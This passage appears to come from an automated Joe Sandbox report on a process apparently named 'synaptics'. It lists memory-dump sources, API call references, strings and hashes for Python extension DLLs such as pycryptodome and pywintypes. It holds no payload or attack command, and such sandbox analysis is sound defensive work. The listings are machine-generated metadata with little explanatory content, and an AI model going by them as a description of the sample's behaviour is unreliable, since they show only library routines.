                                                                                                                                                                                                              • Associated: 00000018.00000002.3082736553.000000006BF89000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf80000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wassert
                                                                                                                                                                                                              • String ID: D:\a\pycryptodome\pycryptodome\src\multiply_32.c$D:\a\pycryptodome\pycryptodome\src\multiply_32.c$carry == 0$t_words >= a_words
                                                                                                                                                                                                              • API String ID: 3234217646-3356547257
                                                                                                                                                                                                              • Opcode ID: d400279de9c584b57920ad7da1d1f2915058e32658aae92bad67e7c1c05d5857
                                                                                                                                                                                                              • Instruction ID: 9c49e737bea9c61b0f7254f5f3631bdc8a8eb6db4ab05f308af0f60540fb434a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d400279de9c584b57920ad7da1d1f2915058e32658aae92bad67e7c1c05d5857
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F41D3329143168FCB15CE38D85099AB3B5EF91745F14C72EFC566B260E731E985CB82
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_UnpackTuple.PYTHON310(?,POINTER,00000000,00000001,?), ref: 6C0A764B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_TupleUnpack
                                                                                                                                                                                                              • String ID: POINTER$expected %s instead of %s
                                                                                                                                                                                                              • API String ID: 671672751-3801548627
                                                                                                                                                                                                              • Opcode ID: fa5b4b0db4e89dc744e7f42b1667125fb8dff94952a47d8d9d5271cbad30b24c
                                                                                                                                                                                                              • Instruction ID: 65d470d130543e0eb76ba1d5997ce7638fd6266eb332737aa883ad521c86cdf3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fa5b4b0db4e89dc744e7f42b1667125fb8dff94952a47d8d9d5271cbad30b24c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 143108756001019BCB10CADCDC41B95B3FDEF49329F248765EC2DD7AA2DB32E8218791
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6BF489BD
                                                                                                                                                                                                              • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6BF48A00
                                                                                                                                                                                                              • VariantTimeToSystemTime.OLEAUT32(?,?), ref: 6BF48A54
                                                                                                                                                                                                              • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES310(VariantTimeToSystemTime,00000000,?,?), ref: 6BF48A64
                                                                                                                                                                                                              • ?PyWinObject_FromSYSTEMTIME@@YAPAU_object@@ABU_SYSTEMTIME@@@Z.PYWINTYPES310(?,?,?), ref: 6BF48A99
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • VariantTimeToSystemTime, xrefs: 6BF48A5F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: TimeU_object@@floor$E@@@Error@@FromObject_SystemVariantWin_
                                                                                                                                                                                                              • String ID: VariantTimeToSystemTime
                                                                                                                                                                                                              • API String ID: 2084367495-2676162551
                                                                                                                                                                                                              • Opcode ID: da185a60e1d415aa73c0ebe639f47cf9a5b3a2dbebc52c9225154beff49fe616
                                                                                                                                                                                                              • Instruction ID: c3d9ccee3f870bc54652bffd62905dd9f0d2dd9d78110c9cd7d9ca7a162dba9d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: da185a60e1d415aa73c0ebe639f47cf9a5b3a2dbebc52c9225154beff49fe616
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F31E37282DF048AC743EF75945111AFBB9BFAB2C9B008716F88A75171EF32C1958742
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3090490537.000000006C031000.00000020.00000001.01000000.0000002A.sdmp, Offset: 6C030000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3090285061.000000006C030000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3090687006.000000006C033000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3090881392.000000006C035000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c030000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: dllmain_raw$Main@12dllmain_crt_dispatch
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3353612457-0
                                                                                                                                                                                                              • Opcode ID: cd06c7cd79ffd88d65e50c3b919a41c7714903f741cb3f57dca138337b59b368
                                                                                                                                                                                                              • Instruction ID: 9cf6afdd2a8e30ed875cdd22aca7c7b43d7c7f39107c780b97044e921851b004
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd06c7cd79ffd88d65e50c3b919a41c7714903f741cb3f57dca138337b59b368
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F621B472E05237AACB214F55C840BAF3AF9EB8DB98B016115F81D9BA10C730DD168BA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3084730871.000000006BFC1000.00000020.00000001.01000000.00000031.sdmp, Offset: 6BFC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3084621815.000000006BFC0000.00000002.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3084925591.000000006BFC3000.00000002.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3085116642.000000006BFC4000.00000004.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3085224740.000000006BFC5000.00000002.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bfc0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: dllmain_raw$Main@12dllmain_crt_dispatch
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3353612457-0
                                                                                                                                                                                                              • Opcode ID: e644ab2856ba7517fe1441e82c7e25dfbec931bf79aeb75965452e2e9717a29d
                                                                                                                                                                                                              • Instruction ID: 4df3dce0fa6e2dcf02a1c6d929937d343827d8c034ee8c519b8a848c055a757a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e644ab2856ba7517fe1441e82c7e25dfbec931bf79aeb75965452e2e9717a29d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0121B773D00537ABDB214E64CC41AAF3A79EB85B99B014155F81597630C3398FF18B92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • dllmain_raw.LIBCMT ref: 6BF4C504
                                                                                                                                                                                                              • dllmain_crt_dispatch.LIBCMT ref: 6BF4C51B
                                                                                                                                                                                                              • _DllMain@12.PYWINTYPES310(?,00000001,00000000,?,00000001,00000000,?,00000001,00000000,6BF531C0,0000000C,00000007,6BF53198,00000010,6BF4C30B,?), ref: 6BF4C532
                                                                                                                                                                                                              • _DllMain@12.PYWINTYPES310(?,00000000,00000000,?,00000001,00000000,?,00000001,00000000,6BF531C0,0000000C,00000007,6BF53198,00000010,6BF4C30B,?), ref: 6BF4C54A
                                                                                                                                                                                                              • dllmain_raw.LIBCMT ref: 6BF4C563
                                                                                                                                                                                                              • dllmain_crt_dispatch.LIBCMT ref: 6BF4C576
                                                                                                                                                                                                              • dllmain_raw.LIBCMT ref: 6BF4C589
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: dllmain_raw$Main@12dllmain_crt_dispatch
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3353612457-0
                                                                                                                                                                                                              • Opcode ID: d50316632584cd27af52e56ac6cf492f781b61f5fe6bee7d0f40a9362f9cc086
                                                                                                                                                                                                              • Instruction ID: b5aacb5b25f987b9f0b5d402970bed66f1b774673df68e07dae5835cf3e35c00
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d50316632584cd27af52e56ac6cf492f781b61f5fe6bee7d0f40a9362f9cc086
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B621C173D00619ABDB218F65CC41ABF3E78EB84B94F01655AFC1467272D7388E198BE0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3082077383.000000006BF81000.00000020.00000001.01000000.00000034.sdmp, Offset: 6BF80000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3081877305.000000006BF80000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082332200.000000006BF87000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082540453.000000006BF88000.00000004.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082736553.000000006BF89000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf80000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: dllmain_raw$Main@12dllmain_crt_dispatch
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3353612457-0
                                                                                                                                                                                                              • Opcode ID: 1e63ddc601bbde5ab0bcee7898ef991fe755dc4d6b2eb7b79f4469ea7784d15a
                                                                                                                                                                                                              • Instruction ID: 2ae4f129bac709a8a573065996d3bdd6b6184357bf626537f941e31cb4277643
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e63ddc601bbde5ab0bcee7898ef991fe755dc4d6b2eb7b79f4469ea7784d15a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 10215673D01576EBDB218F65CC41AAF3A79EB89B94B014355F8349B630C3398F618BA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3092314378.000000006C051000.00000020.00000001.01000000.00000028.sdmp, Offset: 6C050000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3092106316.000000006C050000.00000002.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3092520115.000000006C054000.00000002.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3092720561.000000006C055000.00000004.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3092992757.000000006C056000.00000002.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c050000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: dllmain_raw$Main@12dllmain_crt_dispatch
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3353612457-0
                                                                                                                                                                                                              • Opcode ID: 70dc046c79977743193109a14796e187a1ff16b034002413c3ae9e4c588a2c71
                                                                                                                                                                                                              • Instruction ID: 2daea9e47e520a4f9f19cacf9679d9f51ea8c78be49b2f8971e3a048c813a3a0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 70dc046c79977743193109a14796e187a1ff16b034002413c3ae9e4c588a2c71
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A721B272E05619FBCB215E55CA84FAF3AF9EB85B98B814115F824A7E10C730DD718BE0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3079308505.000000006BF31000.00000020.00000001.01000000.00000037.sdmp, Offset: 6BF30000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079115779.000000006BF30000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079418715.000000006BF33000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079607016.000000006BF34000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079797292.000000006BF35000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf30000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: dllmain_raw$Main@12dllmain_crt_dispatch
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3353612457-0
                                                                                                                                                                                                              • Opcode ID: 10ecbb9abdf674762047ef23e3c35b567573e6fffa9919be2064ac56a9cf9b2d
                                                                                                                                                                                                              • Instruction ID: 29c2c684f129bc2eb5b13e5a8b2b3701d573970c3ef32fafddd51fb8d7df0db8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 10ecbb9abdf674762047ef23e3c35b567573e6fffa9919be2064ac56a9cf9b2d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E921B573E0063AABCB215F65CC81A6F3A79EB85B95B014155FC1597630C739CF128BE0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,Pointer does not support item deletion), ref: 6C0A7567
                                                                                                                                                                                                              • PyType_IsSubtype.PYTHON310(?,6C0B56F8), ref: 6C0A75A3
                                                                                                                                                                                                              • PyObject_IsInstance.PYTHON310(?,?), ref: 6C0A75B4
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9584,expected %s instead of %s,?,?), ref: 6C0A75DE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • expected %s instead of %s, xrefs: 6C0A75D7
                                                                                                                                                                                                              • Pointer does not support item deletion, xrefs: 6C0A7560
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_$FormatInstanceObject_StringSubtypeType_
                                                                                                                                                                                                              • String ID: Pointer does not support item deletion$expected %s instead of %s
                                                                                                                                                                                                              • API String ID: 1243598503-2046472288
                                                                                                                                                                                                              • Opcode ID: e9dbbdebfed6c32824566edeea66dce7fcf180bfb69d664f0ca2fe3a8dcf50a3
                                                                                                                                                                                                              • Instruction ID: 150a3a5ab1b305786db1e69ca41016e35ce7ad31301cda0f768d7b73d0cb58c5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e9dbbdebfed6c32824566edeea66dce7fcf180bfb69d664f0ca2fe3a8dcf50a3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 892128716001019BCB008BFDD940B95B3F9EF4933D7148A65E92EC7AA6DB32E826C750
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(t_nw >= a_nw + 2,D:\a\pycryptodome\pycryptodome\src\multiply_32.c,0000008F,?,?,?,?,00000000,?,?,?,?,?,?), ref: 6BF8547D
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 6BF854A3
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,00000000,?,?,?,00000000,?,?,?,?,?,?), ref: 6BF854B8
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6BF85520
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • t_nw >= a_nw + 2, xrefs: 6BF85478
                                                                                                                                                                                                              • D:\a\pycryptodome\pycryptodome\src\multiply_32.c, xrefs: 6BF85473
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3082077383.000000006BF81000.00000020.00000001.01000000.00000034.sdmp, Offset: 6BF80000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3081877305.000000006BF80000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082332200.000000006BF87000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082540453.000000006BF88000.00000004.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082736553.000000006BF89000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf80000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memcpy$_wassert
                                                                                                                                                                                                              • String ID: D:\a\pycryptodome\pycryptodome\src\multiply_32.c$t_nw >= a_nw + 2
                                                                                                                                                                                                              • API String ID: 4178124637-1164548873
                                                                                                                                                                                                              • Opcode ID: 3c043925e1e4b755fc5e903459695c920013139a9f0ddad1cdf5652e7940f5b8
                                                                                                                                                                                                              • Instruction ID: 98b1787b42888a18cc1907f7277072baa44cf896c87dc0207722777692018162
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c043925e1e4b755fc5e903459695c920013139a9f0ddad1cdf5652e7940f5b8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13218E725143157BC3109B61EC41E9BBBBEEFC6358F40492CF94916220E739E918CAA2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyType_IsSubtype.PYTHON310(?,?,?,6BF481F7,?,?), ref: 6BF482F6
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9584,must be a pywintypes time object (got %s),?), ref: 6BF48315
                                                                                                                                                                                                              • PyObject_CallMethod.PYTHON310(?,astimezone,6BF5136C,00000000,?,?,6BF481F7,?,?), ref: 6BF48334
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF,?,?), ref: 6BF483AE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • must be a pywintypes time object (got %s), xrefs: 6BF4830E
                                                                                                                                                                                                              • astimezone, xrefs: 6BF4832E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CallDeallocErr_FormatMethodObject_SubtypeType_
                                                                                                                                                                                                              • String ID: astimezone$must be a pywintypes time object (got %s)
                                                                                                                                                                                                              • API String ID: 244768906-1654730096
                                                                                                                                                                                                              • Opcode ID: 9e611e1b6ab12414c5b042b6d8153aaa7608e7f6757dccf3c9640d294e8e9792
                                                                                                                                                                                                              • Instruction ID: 9009a33d5ca033d07c186193478044845fa58b5237382446c9a6d4458c0057c5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e611e1b6ab12414c5b042b6d8153aaa7608e7f6757dccf3c9640d294e8e9792
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 782103361246925BC7299F38D814676BFF0FF592113048989F8E6C3A62E32CE574DBA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,?), ref: 6BF417CE
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6BF417DC
                                                                                                                                                                                                              • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 6BF417F9
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7EADFC,SetACL: Unable to reallocate ACL to size %d,?), ref: 6BF4181A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • SetACL: Unable to reallocate ACL to size %d, xrefs: 6BF41813
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_Formatmemcpymemsetrealloc
                                                                                                                                                                                                              • String ID: SetACL: Unable to reallocate ACL to size %d
                                                                                                                                                                                                              • API String ID: 360308203-1849531889
                                                                                                                                                                                                              • Opcode ID: 05c08a8ccaa231f33b079c48d83d7f0a3827ebd18068ea7d92853f70b1dc9fdc
                                                                                                                                                                                                              • Instruction ID: 479801e85497218f525a392d06016c550ad993ef49efc0b588384531ea267425
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 05c08a8ccaa231f33b079c48d83d7f0a3827ebd18068ea7d92853f70b1dc9fdc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9201087365011167D3149B59EC85E73FBACFF56326B008466F54886612E736E87483B4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9584,unicode string expected instead of %s instance,?), ref: 6C0AD238
                                                                                                                                                                                                              • PyUnicode_AsWideChar.PYTHON310(?,00000000,00000000), ref: 6C0AD24C
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9C54,string too long (%zd, maximum length %zd),-00000001,?), ref: 6C0AD26C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • string too long (%zd, maximum length %zd), xrefs: 6C0AD265
                                                                                                                                                                                                              • unicode string expected instead of %s instance, xrefs: 6C0AD231
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_Format$CharUnicode_Wide
                                                                                                                                                                                                              • String ID: string too long (%zd, maximum length %zd)$unicode string expected instead of %s instance
                                                                                                                                                                                                              • API String ID: 738302398-2061977717
                                                                                                                                                                                                              • Opcode ID: 3574c83860949d97c29accaa9429269ca3a57c4926fc6b5080a5680deedce0b1
                                                                                                                                                                                                              • Instruction ID: 9dff6f275bddbd28abc04be926b080e479cf1abdbbc829f79471f5ff0bda7d02
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3574c83860949d97c29accaa9429269ca3a57c4926fc6b5080a5680deedce0b1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8401B172344204AFCB119B9CDE05B8577F8EF82769F104821FE0DD3151D732E5269B99
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7EB154,AddAuditAccessAceEx not supported by this version of Windows), ref: 6BF42E61
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,lllOii:AddAuditAccessAceEx,?,?,?,?,?,?), ref: 6BF42E99
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,The object is not a PySID object), ref: 6BF42EBF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • AddAuditAccessAceEx not supported by this version of Windows, xrefs: 6BF42E5A
                                                                                                                                                                                                              • The object is not a PySID object, xrefs: 6BF42EB8
                                                                                                                                                                                                              • lllOii:AddAuditAccessAceEx, xrefs: 6BF42E90
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_$Arg_FormatParseStringTuple
